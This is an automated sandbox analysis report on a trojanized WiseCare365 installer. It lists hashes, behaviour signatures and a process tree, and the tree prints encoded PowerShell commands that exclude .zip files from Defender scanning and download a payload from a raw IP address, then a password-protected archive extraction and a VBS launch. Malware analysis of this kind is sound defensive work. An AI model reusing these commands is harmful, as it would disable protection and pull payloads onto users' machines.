Overview

overview

10

Static

static

WiseCare365_Setup.exe

windows7-x64

10

WiseCare365_Setup.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    25-10-2022 14:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    WiseCare365_Setup.exe

  • Size

    41.2MB

  • MD5

    a054cf67547476c2ab1b4d8e66bff7b3

  • SHA1

    b1b29a1ce3b6ee3bbea3ef30c36d7bd0f0935699

  • SHA256

    8baf828cdb482e769c87e58d47782100ebce01c9039a670b154d0f8eca958948

  • SHA512

    f672dcc0e190b22664770c2ce151a384e5bc06bce98e9f71e8f4a7eb480c08e5c15f14cdbc8a141599c854a5bfd0edecad63795edf388a752259855fe90c135f

  • SSDEEP

    786432:QsCKwcgE6McNv4noJS8nqOkx1Aiwn6QB3bwvNf1soEZLM/1A6LAVByFkWOOrHSPb:JChcgEFc/AnxlCboZ1dE18Zk0kWIb

Score
10/10
discovery

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://31.42.177.171/hfile.bin

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 20 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
    adwarespyware
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 53 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\WiseCare365_Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\WiseCare365_Setup.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Users\Admin\AppData\Local\Temp\is-42RGJ.tmp\WiseCare365_Setup.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-42RGJ.tmp\WiseCare365_Setup.tmp" /SL5="$D0152,41919602,1320448,C:\Users\Admin\AppData\Local\Temp\WiseCare365_Setup.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1168
      • C:\Users\Admin\AppData\Local\Temp\is-48KE1.tmp\Wise Care 365 6.3.5.613.exe
        "C:\Users\Admin\AppData\Local\Temp\is-48KE1.tmp\Wise Care 365 6.3.5.613.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:940
        • C:\Users\Admin\AppData\Local\Temp\is-GT16F.tmp\Wise Care 365 6.3.5.613.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-GT16F.tmp\Wise Care 365 6.3.5.613.tmp" /SL5="$101B0,39988502,64512,C:\Users\Admin\AppData\Local\Temp\is-48KE1.tmp\Wise Care 365 6.3.5.613.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2004
          • C:\Windows\SysWOW64\regedit.exe
            "C:\Windows\regedit.exe" /S "C:\Users\Admin\AppData\Local\Temp\is-48KE1.tmp\settings.reg"
            5⤵
            • Runs .reg file with regedit
            PID:560
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" https://lrepacks.net/
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:756
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:756 CREDAT:275457 /prefetch:2
              6⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:1412
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\ProgramData\SurfaceReduction\main.bat" "
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:656
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nop -noni -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIAAoACcALgB6AGkAcAAnACkA
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1520
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nop -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAzADEALgA0ADIALgAxADcANwAuADEANwAxAC8AaABmAGkAbABlAC4AYgBpAG4AJwAsACAAJwBoAGYAaQBsAGUALgBiAGkAbgAnACkA
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:780
        • C:\ProgramData\SurfaceReduction\7za.exe
          7za x -y -p10619mlgrAGP7211mlgrAGP24753 "hfile.zip"
          4⤵
          • Executes dropped EXE
          PID:1144
        • C:\Windows\SysWOW64\cscript.exe
          cscript CurrentControlSet003.vbs
          4⤵
          • Blocklisted process makes network request
          PID:1492

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\SurfaceReduction\7za.exe
    Filesize

    572KB

    MD5

    c3d309156b8e8cf1d158de5fab1c2b40

    SHA1

    58ad15d91abac2c6203e389ac8a8ff6685406d41

    SHA256

    993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

    SHA512

    2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

    Download Submit

  • C:\ProgramData\SurfaceReduction\7za.exe
    Filesize

    572KB

    MD5

    c3d309156b8e8cf1d158de5fab1c2b40

    SHA1

    58ad15d91abac2c6203e389ac8a8ff6685406d41

    SHA256

    993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

    SHA512

    2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

    Download Submit

  • C:\ProgramData\SurfaceReduction\CurrentControlSet003.vbs
    Filesize

    37KB

    MD5

    5368c403a3095c30c9a177e3af375e68

    SHA1

    3a2b02a2189b613cb3303620df95b88a04909700

    SHA256

    c1dd883daffad68f4dbc80e9d376a88605d070e6182a5fd01b0460b09d54f536

    SHA512

    a9c1d2cff25a49eba0b9e95609e5f10dbe8f78762ccce6b89c39f57dc27878d5fec60bd6d7aa53e1fe1f7cca7a7b30db661b0e85c646925bf945854648643b7f

    Download Submit

  • C:\ProgramData\SurfaceReduction\hfile.bin
    Filesize

    8.3MB

    MD5

    5a9fb4a562bc9d81d63b9a11b7133f96

    SHA1

    6e4dbeda683738454ff27cf7b68ea6a4de0dd189

    SHA256

    39902b665f9be542ca72e484842f9361a7201dabd01ca71e8a933614e39a62bd

    SHA512

    9b5251913a02d849f2c7544a793f50a0790dda17ca21141d802aa03d4220c99e8cafe61c4b52840ac9bd1fc04d79a6a2ace87ffb49b4d8ef03a37b373f1ae512

    Download Submit

  • C:\ProgramData\SurfaceReduction\main.bat
    Filesize

    5KB

    MD5

    0c29aad924c522ccd4e69a6ff68c625a

    SHA1

    296cdf8081965c128003fda4aa0a5eb168330d83

    SHA256

    1b553e46f0e4d710fba900acd29903a964cb77942e6f6ea7e6799f4d3d8ed7ab

    SHA512

    85280dd9222a19e422715be94b8c1d86f5ec28677194e909726e43cecb59c44ee8406cded847eb3774776539eac0a7bf60573156e6f1b7d3f0a1a12276ff463e

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    60KB

    MD5

    d15aaa7c9be910a9898260767e2490e1

    SHA1

    2090c53f8d9fc3fbdbafd3a1e4dc25520eb74388

    SHA256

    f8ebaaf487cba0c81a17c8cd680bdd2dd8e90d2114ecc54844cffc0cc647848e

    SHA512

    7e1c1a683914b961b5cc2fe5e4ae288b60bab43bfaa21ce4972772aa0589615c19f57e672e1d93e50a7ed7b76fbd2f1b421089dcaed277120b93f8e91b18af94

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    e57a682ee2b6818a1e86fd9be412c5f0

    SHA1

    a697af783719feffb935eee272ddd0533a48e75c

    SHA256

    5bfab9f82c50fd418a5d755823ad233565c0a20aec06367a30c7e1cea05dd4d9

    SHA512

    ddacc25817d3458f888da21df7bfceab6fc74a93c1d157da39c951504104e7122d5cf2a0e22f76157c1e1c84150a83294711ea0cd4749d035883b8dce83ef106

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\309axvf\imagestore.dat
    Filesize

    5KB

    MD5

    586c8c0c577bd7753e0eddebd916f706

    SHA1

    0f91fd4ac93e6c40009831c235075f42a9b2585a

    SHA256

    89d5dcf334ea9ef77d63cd3ec85c959e474f4fd1fbfcfabc6d870c2d584bff1a

    SHA512

    f303a7f844b028667da0fc1dd190564b12a3edacaeca9620e840c5262be0a6d1b2888de143f6c61c8cae8022ecd7cb24520dceff79e72358b43ea5bce07ce94b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\is-42RGJ.tmp\WiseCare365_Setup.tmp
    Filesize

    3.5MB

    MD5

    ee76ae1978f75f7a8086f993a988fdfc

    SHA1

    2e9f55381902fb18a4beb5caab041e21d01f92fe

    SHA256

    cbe6b8d103b4b69bc0e19ea8e66ce55890fc797c7df63c706a8384d820d34681

    SHA512

    5aa492e39828b8656d49734262b5c20e96091d1f18c16914246ced6c46b111a4579926e61ac65df1ae15d8f9483c6cd8bd8e46a73243c98b3f8e3dd4fcbb5bcf

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\is-48KE1.tmp\Wise Care 365 6.3.5.613.exe
    Filesize

    38.5MB

    MD5

    389fae6f3e209729a996f81b14f308b5

    SHA1

    b8a75b1111418bd753535eeefdc804d5dfccc687

    SHA256

    efae3a2b703d1e04e99ee735e9f63207149dea9d4a989bc32728de9e926020f6

    SHA512

    42dc522539f56cdb35cd1f281476b1822be031c56eca45b5da841d15fc37263235677d6acacde7053e9246f6eab2ccc2a3c16f37a63de1925fdd7a1e3a2ffb84

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\is-48KE1.tmp\Wise Care 365 6.3.5.613.exe
    Filesize

    38.5MB

    MD5

    389fae6f3e209729a996f81b14f308b5

    SHA1

    b8a75b1111418bd753535eeefdc804d5dfccc687

    SHA256

    efae3a2b703d1e04e99ee735e9f63207149dea9d4a989bc32728de9e926020f6

    SHA512

    42dc522539f56cdb35cd1f281476b1822be031c56eca45b5da841d15fc37263235677d6acacde7053e9246f6eab2ccc2a3c16f37a63de1925fdd7a1e3a2ffb84

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\is-GT16F.tmp\Wise Care 365 6.3.5.613.tmp
    Filesize

    911KB

    MD5

    9d7850e858c24db77b91b25adf93812f

    SHA1

    f0bb0a9074b38dad7492422247c0a316197d26b6

    SHA256

    c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8

    SHA512

    e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\is-GT16F.tmp\Wise Care 365 6.3.5.613.tmp
    Filesize

    911KB

    MD5

    9d7850e858c24db77b91b25adf93812f

    SHA1

    f0bb0a9074b38dad7492422247c0a316197d26b6

    SHA256

    c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8

    SHA512

    e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\YNG142I6.txt
    Filesize

    607B

    MD5

    834e443980da2d32131b8f852c3b1e48

    SHA1

    3837d9316314a7ce3a4ed502a50f600864c4f5a4

    SHA256

    b762d48d6c8b59e912c99b99526c168e8a066ced0a8d178caa78e40c41cb1adb

    SHA512

    37351efa1efa71450fe2d082ad83df018b6e1d497d0605b26784b88afbfdbe1629286fefd6c9bc3bcdb3e48453708a6642d8f95eb3f6ab94719af3dded3abde1

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    1240a6142cf286806a10ca274ab39ef6

    SHA1

    4d9d0d9b2ee1f8f7eb52bda8d16fc754b91742f5

    SHA256

    18cdfaa237e5ccd4bb2d2bcdf712ac1341c438423e2ba57ed80da66b9122c141

    SHA512

    cb36f71f7ca7ba25e3ca7560698845e6a5798b9f3424e34c717c657b3b82b6eb162af70cfeb20b134dd87c8015a657da2ea71778c14283e45138c01200ee8565

    Download Submit

  • \Program Files (x86)\Wise Care 365\Wise Auto Shutdown\WiseAutoShutdown.exe
    Filesize

    7.2MB

    MD5

    0ebac5baac621ab4dc6b930e26f2dbb3

    SHA1

    7fb420c4f61eeb14f7e120e279a81b2a500ab0a8

    SHA256

    ba3c79ce781fd9f5d71359fcfee08e12e3f21d5f0ede0af57ad921e321fe5bcc

    SHA512

    2a9fb7a7f37fda0877407dca4119bc7055aa5a47f7cc0e895d3fe5265aeaee28f021580c445156e220b36ecd7eff7abd7fcf2def06b48c87cd91a14b6105b30f

    Download Submit

  • \Program Files (x86)\Wise Care 365\Wise Data Recovery\WiseDataRecovery.exe
    Filesize

    10.6MB

    MD5

    c9c1e02cf332f4c6c2e3c0b267d224f2

    SHA1

    dcc9dad200a05b9f616e1a5b8aa091ed9f11832f

    SHA256

    67374712a860f1858d37a3b629e64f6550e3e7642fa4013d230e666ae70c8927

    SHA512

    f579081fa2138ef35b849fd67f2c686dcd4789ad09d197b74acacee1e652147e31f8346450d8eb142e65de1941012f3f068a6770c2b81d76036dc1adae80562b

    Download Submit

  • \Program Files (x86)\Wise Care 365\Wise Force Deleter\WiseDeleter.exe
    Filesize

    3.6MB

    MD5

    f6c929a6b7b212e8cc83f958f4443b5f

    SHA1

    25e717bd17d944e7d97e521878add32922fdd93a

    SHA256

    1096169d87ff2e876d45f5d2e3be570ff14a51289c915119d49ce2cfc3a439bf

    SHA512

    4fc8945a35163b1febc957888827c9720df466e23a78f9223ad0d6e78bc0f6d003ffbbdbf38bb99fb739a37d0ed484e9f41374669306fc45b66226212f947c85

    Download Submit

  • \Program Files (x86)\Wise Care 365\Wise Game Booster\WiseGameBooster.exe
    Filesize

    6.7MB

    MD5

    123a1b1498ab40b2242a74db95eb96fe

    SHA1

    8380ed6f880fb61c09299e0d2db7ac0cc6196be8

    SHA256

    04ab91e8f6dc33764536234a89c4c63bc7f8b407ce5e592b4f604a0bbd5d93ba

    SHA512

    fa1075f05f74b30a8e603e2ae35e1809d4eae00bfd377a4b95c11158673cac08c49e9fba697e403331c3f25a50c21c721f9548b27e2f0ee457dc6364a1c72d79

    Download Submit

  • \Program Files (x86)\Wise Care 365\Wise JetSearch\WiseJetSearch.exe
    Filesize

    7.6MB

    MD5

    a569ecf86c80e4a2b744b8be15120c3a

    SHA1

    1d763efdb86a904abd6cebbb00e09cef56b3ff4b

    SHA256

    e8610efea5223d1d5867529f90670db3d9785d9ede02357c9d8a1a47a1da74a6

    SHA512

    2173389707a4fa3621c5eb72919317cfe471777fbfff835b1443efcb43d0ef4655c90de420025f9629961710ac0f7aa0c7f77d5f87b829e75b4117391b537e3a

    Download Submit

  • \Program Files (x86)\Wise Care 365\Wise Memory Optimizer\WiseMemoryOptimzer.exe
    Filesize

    7.3MB

    MD5

    68b4221b734f3e316fbac5788f361799

    SHA1

    0681574454511d8df2d831e0d040be6dd7e28f96

    SHA256

    c71afcd85f25e7a650b58bd761fd56db26430b7db3699e020f54123552b7d25e

    SHA512

    1a70d6bf1ac34fc35a1d855888688c76e6322779605cfb331c9399c1e2a4f81e08b4a05f7f1e2ad3ba9697f0246d438e0a59effd5f33a109f2a7161b5d845e66

    Download Submit

  • \Program Files (x86)\Wise Care 365\Wise Program Uninstaller\WiseProgramUninstaller.exe
    Filesize

    11.6MB

    MD5

    61b32430d90c3624a3e18ae0220a1b60

    SHA1

    f4348f729dc95d0523ca5e23ffe6e9b65438b1c9

    SHA256

    4db49e5bcb677568697347e907203684f09eb8048e7e4effafdc7be09b163541

    SHA512

    3532971d8169fe4ae369d2e8842e06a2a4fb7ed1396f99fe62fdc9afe2c5e46c20fded9d9d5aa06b4e48257a49fc06786839990fc484469a6e4c5b0801c9def4

    Download Submit

  • \Program Files (x86)\Wise Care 365\Wise Reminder\WiseReminder.exe
    Filesize

    3.4MB

    MD5

    31441bb37e7babc6c1294a53d4f08453

    SHA1

    b86a5b34ab276d3a0e09a9cd53597be4cd46f77e

    SHA256

    45eb1bb3eae25f0b091fb5c979c48d5dc4f58f8f94d0e490b53483699b43fc20

    SHA512

    c37b9d567d6945f5d2e4ecfbf31a59019b55c69e7e2174533bdd96ce3e99e6a02af981d0650a6c0ba300def4532c565e76c3ea1255a73d2cdb37cbe892d668b7

    Download Submit

  • \Program Files (x86)\Wise Care 365\WiseCare365.exe
    Filesize

    15.5MB

    MD5

    be0389b28433f2439a5c73184b500020

    SHA1

    563c8dbe0f041867f73035950fd4e04e9a8dcf6f

    SHA256

    7d0f972f11136fe9d7312005e5a881b3c88d6ff055eee36cb1dca9dd8ce60e51

    SHA512

    ca9ab59d3c9e3a9979dbffff024e64eff7d98e25a37014aba0628b485b5cc2085bbba48201de6f7b892b9e32d10b094b4cca17b87766f270652302d9bd82401b

    Download Submit

  • \Program Files (x86)\Wise Care 365\unins000.exe
    Filesize

    921KB

    MD5

    59e9ffc3e3477e14f10f93772013288c

    SHA1

    632351c35a685cd68ea085c3ff54a46cdc018c66

    SHA256

    c612f1fa3bc3e7a4d457ce82401bf9ededc864c46c82740f043ecc4efd34d294

    SHA512

    6ae3238d8215943b37e760785224d4e62b6f024776001c3c5a658495e958f9bf0807002223e20dccf2547895ff8fa76ff0678f7fe200e057eaba04a59457df58

    Download Submit

  • \ProgramData\SurfaceReduction\7za.exe
    Filesize

    572KB

    MD5

    c3d309156b8e8cf1d158de5fab1c2b40

    SHA1

    58ad15d91abac2c6203e389ac8a8ff6685406d41

    SHA256

    993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

    SHA512

    2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

    Download Submit

  • \ProgramData\SurfaceReduction\7za.exe
    Filesize

    572KB

    MD5

    c3d309156b8e8cf1d158de5fab1c2b40

    SHA1

    58ad15d91abac2c6203e389ac8a8ff6685406d41

    SHA256

    993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

    SHA512

    2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

    Download Submit

  • \Users\Admin\AppData\Local\Temp\is-42RGJ.tmp\WiseCare365_Setup.tmp
    Filesize

    3.5MB

    MD5

    ee76ae1978f75f7a8086f993a988fdfc

    SHA1

    2e9f55381902fb18a4beb5caab041e21d01f92fe

    SHA256

    cbe6b8d103b4b69bc0e19ea8e66ce55890fc797c7df63c706a8384d820d34681

    SHA512

    5aa492e39828b8656d49734262b5c20e96091d1f18c16914246ced6c46b111a4579926e61ac65df1ae15d8f9483c6cd8bd8e46a73243c98b3f8e3dd4fcbb5bcf

    Download Submit

  • \Users\Admin\AppData\Local\Temp\is-48KE1.tmp\Wise Care 365 6.3.5.613.exe
    Filesize

    38.5MB

    MD5

    389fae6f3e209729a996f81b14f308b5

    SHA1

    b8a75b1111418bd753535eeefdc804d5dfccc687

    SHA256

    efae3a2b703d1e04e99ee735e9f63207149dea9d4a989bc32728de9e926020f6

    SHA512

    42dc522539f56cdb35cd1f281476b1822be031c56eca45b5da841d15fc37263235677d6acacde7053e9246f6eab2ccc2a3c16f37a63de1925fdd7a1e3a2ffb84

    Download Submit

  • \Users\Admin\AppData\Local\Temp\is-48KE1.tmp\_isetup\_iscrypt.dll
    Filesize

    2KB

    MD5

    a69559718ab506675e907fe49deb71e9

    SHA1

    bc8f404ffdb1960b50c12ff9413c893b56f2e36f

    SHA256

    2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

    SHA512

    e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

    Download Submit

  • \Users\Admin\AppData\Local\Temp\is-GT16F.tmp\Wise Care 365 6.3.5.613.tmp
    Filesize

    911KB

    MD5

    9d7850e858c24db77b91b25adf93812f

    SHA1

    f0bb0a9074b38dad7492422247c0a316197d26b6

    SHA256

    c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8

    SHA512

    e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec

    Download Submit

  • \Users\Admin\AppData\Local\Temp\is-S3FPI.tmp\ISTask.dll
    Filesize

    66KB

    MD5

    86a1311d51c00b278cb7f27796ea442e

    SHA1

    ac08ac9d08f8f5380e2a9a65f4117862aa861a19

    SHA256

    e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d

    SHA512

    129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

    Download Submit

  • \Users\Admin\AppData\Local\Temp\is-S3FPI.tmp\VclStylesInno.dll
    Filesize

    3.0MB

    MD5

    b0ca93ceb050a2feff0b19e65072bbb5

    SHA1

    7ebbbbe2d2acd8fd516f824338d254a33b69f08d

    SHA256

    0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246

    SHA512

    37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2

    Download Submit

  • \Users\Admin\AppData\Local\Temp\is-S3FPI.tmp\_isetup\_shfoldr.dll
    Filesize

    22KB

    MD5

    92dc6ef532fbb4a5c3201469a5b5eb63

    SHA1

    3e89ff837147c16b4e41c30d6c796374e0b8e62c

    SHA256

    9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

    SHA512

    9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

    Download Submit

  • \Users\Admin\AppData\Local\Temp\is-S3FPI.tmp\_isetup\_shfoldr.dll
    Filesize

    22KB

    MD5

    92dc6ef532fbb4a5c3201469a5b5eb63

    SHA1

    3e89ff837147c16b4e41c30d6c796374e0b8e62c

    SHA256

    9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

    SHA512

    9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

    Download Submit

  • memory/560-155-0x0000000000000000-mapping.dmp

    Download

  • memory/656-68-0x0000000000000000-mapping.dmp

    Download

  • memory/780-133-0x0000000074480000-0x0000000074A2B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/780-129-0x0000000000000000-mapping.dmp

    Download

  • memory/780-132-0x0000000074480000-0x0000000074A2B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/940-69-0x0000000000400000-0x0000000000417000-memory.dmp

    Filesize

    92KB

    Download

  • memory/940-65-0x0000000000000000-mapping.dmp

    Download

  • memory/940-157-0x0000000000400000-0x0000000000417000-memory.dmp

    Filesize

    92KB

    Download

  • memory/940-126-0x0000000000400000-0x0000000000417000-memory.dmp

    Filesize

    92KB

    Download

  • memory/1144-138-0x0000000000000000-mapping.dmp

    Download

  • memory/1168-63-0x0000000074DA1000-0x0000000074DA3000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1168-58-0x0000000000000000-mapping.dmp

    Download

  • memory/1492-140-0x0000000000000000-mapping.dmp

    Download

  • memory/1520-127-0x0000000074560000-0x0000000074B0B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1520-82-0x0000000000000000-mapping.dmp

    Download

  • memory/1520-128-0x0000000074560000-0x0000000074B0B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2004-85-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-103-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-113-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-114-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-115-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-116-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-117-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-118-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-119-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-120-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-121-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-122-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-123-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-124-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-125-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-110-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-111-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-109-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-108-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-107-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-106-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-105-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-104-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-112-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-102-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-101-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-100-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-99-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-98-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-97-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-143-0x0000000074E31000-0x0000000074E33000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2004-96-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-94-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-93-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2004-92-0x00000000070B0000-0x00000000071F0000-memory.dmp

    Filesize

